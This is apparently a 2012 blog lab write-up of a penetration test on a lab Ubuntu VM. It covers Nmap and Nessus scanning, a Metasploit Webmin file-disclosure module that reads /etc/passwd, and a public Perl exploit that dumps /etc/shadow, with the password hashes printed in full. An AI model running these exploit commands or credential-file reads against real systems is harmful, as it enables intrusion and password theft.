IS2C: Exploitation to Previlege Escalation

Information Gathering 

Zenmap to look up service and port has open or run

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)  

Device type: general purpose  

Running: Linux 2.6.X  

OS CPE: cpe:/o:linux:kernel:2.6.22  

OS details: Linux 2.6.22 (embedded, ARM)  

Uptime guess: 0.021 days (since Mon Jan 30 17:27:33 2012)  

Network Distance: 1 hop  

TCP Sequence Prediction: Difficulty=209 (Good luck!)  

IP ID Sequence Generation: All zeros  

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel  

Host script results:  

| nbstat:  

|   NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>  

|   Names  

|     UBUNTUVM<00>         Flags: <unique><active>  

|     UBUNTUVM<03>         Flags: <unique><active>  

|     UBUNTUVM<20>         Flags: <unique><active>  

|     \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>  

|     MSHOME<1d>           Flags: <unique><active>  

|     MSHOME<1e>           Flags: <group><active>  

|_    MSHOME<00>           Flags: <group><active>  

|_smbv2-enabled: Server doesn't support SMBv2 protocol  

| smb-security-mode:  

|   Account that was used for smb scripts: guest  

|   User-level authentication  

|   SMB Security: Challenge/response passwords supported  

|_  Message signing disabled (dangerous, but default)  

| smb-os-discovery:  

|   OS: Unix (Samba 3.0.26a)  

|   Computer name: ubuntuvm  

|   Domain name: nsdlab  

|   FQDN: ubuntuvm.NSDLAB  

|   NetBIOS computer name:  

|_  System time: 2012-01-31 00:58:10 UTC-6  

TRACEROUTE  

HOP RTT     ADDRESS  

1   0.52 ms 192.168.0.21  

NSE: Script Post-scanning.  

Initiating NSE at 17:58  

Completed NSE at 17:58, 0.00s elapsed  

Read data files from: /usr/local/bin/../share/nmap  

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .  

Nmap done: 1 IP address (1 host up) scanned in 28.16 seconds  

           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)  

From that I suppose that web application is running so I check to that IP in my browser and I found Web page it that server is active, so I want to penetrate this server with anything from web 

Vulnerability Assesment and Indentification

Then the Nessus Vulnerability Scanning
Given the level of vulnerability on the target and see more details of services running
Following up on port 10000 on the web application
Results of Nessus Webmin application states has a gap

Exploitation

Metasploit

msf > search webmin

Matching Modules

================

   Name                                    Disclosure Date  Rank    Description

   ----                                    ---------------  ----    -----------

   auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  Webmin file disclosure

msf > use auxiliary/admin/webmin/file_disclosure

msf  auxiliary(file_disclosure) > set RHOST 192.168.0.21

RHOST => 192.168.0.21

msf  auxiliary(file_disclosure) > set LPORT 10000

LPORT => 10000

msf  auxiliary(file_disclosure) > set LHOST 192.168.0.27

LHOST => 192.168.0.27

msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...

[*] The server returned: 200 Document follows

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

dhcp:x:100:101::/nonexistent:/bin/false

syslog:x:101:102::/home/syslog:/bin/false

klog:x:102:103::/home/klog:/bin/false

mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash

obama:x:1001:1001::/home/obama:/bin/bash

osama:x:1002:1002::/home/osama:/bin/bash

yomama:x:1003:1003::/home/yomama:/bin/bash

After seeing the contents of / etc / passwd I have not managed to get my password and user should try to use the exploit-DB by searching for keywords Webmin which I suspect has a gap

I tried with the way the exploit Exploit-BD

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin

 Description                                                                 Path

--------------------------------------------------------------------------- -------------------------

Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl

Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi

Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000  /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!

Comments and Suggestions are welcome at umz32.dll [at] gmail.com

Vulnerability disclose at securitydot.net

I am just coding it in perl 'cuz I hate PHP!

Attacking 192.168.0.21 on port 10000!

FILENAME:  /etc/shadow

 FILE CONTENT STARTED

 -----------------------------------

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

Now I managed to go in and open a shadow file in / etc / shadow in server target, and to next step we need to treat crack password from that hash password

IS2C

Tuesday, January 31, 2012

Exploitation to Previlege Escalation

No comments:

Post a Comment

Search

Articles

Comments

Visitor